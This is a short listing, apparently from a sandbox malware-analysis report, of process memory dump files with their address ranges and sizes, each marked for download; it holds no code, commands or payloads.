          • memory/3000-21-0x0000000005440000-0x0000000005462000-memory.dmp
            Filesize

            136KB

            Download
          • memory/3000-22-0x0000000005BB0000-0x0000000005C16000-memory.dmp
            Filesize

            408KB

            Download
          • memory/3000-23-0x0000000005C90000-0x0000000005CF6000-memory.dmp
            Filesize

            408KB

            Download
          • memory/3000-38-0x00000000075C0000-0x0000000007656000-memory.dmp
            Filesize

            600KB

            Download
          • memory/3456-78-0x00000000088E0000-0x0000000008A6F000-memory.dmp
            Filesize

            1.6MB

            Download
          • memory/4560-55-0x0000000001240000-0x0000000004DFA000-memory.dmp
            Filesize

            59.7MB

            Download
          • memory/4560-49-0x0000000001240000-0x0000000004DFA000-memory.dmp
            Filesize

            59.7MB

            Download
          • memory/4740-58-0x0000000000CA0000-0x0000000000CCF000-memory.dmp
            Filesize

            188KB

            Download
          • memory/4740-57-0x0000000000D20000-0x0000000001153000-memory.dmp
            Filesize

            4.2MB

            Download
          • memory/4740-54-0x0000000000D20000-0x0000000001153000-memory.dmp
            Filesize

            4.2MB

            Download